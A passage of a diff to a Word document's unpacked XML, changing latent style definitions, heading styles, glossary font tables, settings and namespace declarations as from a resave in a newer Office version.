-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
-  </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
-    <w:name w:val="Normal"/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Titre1">
-    <w:name w:val="heading 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Titre1Car"/>
-    <w:uiPriority w:val="9"/>
-    <w:qFormat/>
-    <w:rsid w:val="00236FF1"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="480" w:after="0"/>
-      <w:outlineLvl w:val="0"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
-      <w:sz w:val="28"/>
-      <w:szCs w:val="28"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Titre2">
-    <w:name w:val="heading 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Titre2Car"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="00141610"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
-      <w:outlineLvl w:val="1"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="26"/>
-      <w:szCs w:val="26"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Titre3">
-    <w:name w:val="heading 3"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Titre3Car"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="00141610"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
-      <w:outlineLvl w:val="2"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
-    <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
@@ -21119,7 +21075,7 @@
 </file>
 
 <file path=word/glossary/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:docParts>
     <w:docPart>
       <w:docPartPr>
@@ -21278,7 +21234,7 @@
 </file>
 
 <file path=word/glossary/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
-<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
   <w:font w:name="Times New Roman">
     <w:panose1 w:val="02020603050405020304"/>
     <w:charset w:val="00"/>
@@ -21319,7 +21275,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="roman"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+    <w:sig w:usb0="E00006FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Tahoma">
     <w:panose1 w:val="020B0604030504040204"/>
@@ -21329,18 +21285,24 @@
     <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Helvetica">
-    <w:panose1 w:val="020B0504020202020204"/>
+    <w:panose1 w:val="020B0604020202020204"/>
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
-    <w:notTrueType/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Calibri Light">
+    <w:panose1 w:val="020F0302020204030204"/>
+    <w:charset w:val="00"/>
+    <w:family w:val="swiss"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
 </w:fonts>
 </file>
 
 <file path=word/glossary/settings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14">
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid">
   <w:view w:val="normal"/>
   <w:defaultTabStop w:val="708"/>
   <w:hyphenationZone w:val="425"/>
@@ -21351,9 +21313,11 @@
     <w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
     <w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
     <w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
+    <w:compatSetting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
   </w:compat>
   <w:rsids>
     <w:rsidRoot w:val="00FB4360"/>
+    <w:rsid w:val="00A859A4"/>
     <w:rsid w:val="00FB4360"/>
   </w:rsids>
   <m:mathPr>
@@ -21377,7 +21341,7 @@
 </file>
 
 <file path=word/glossary/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -21393,358 +21357,382 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
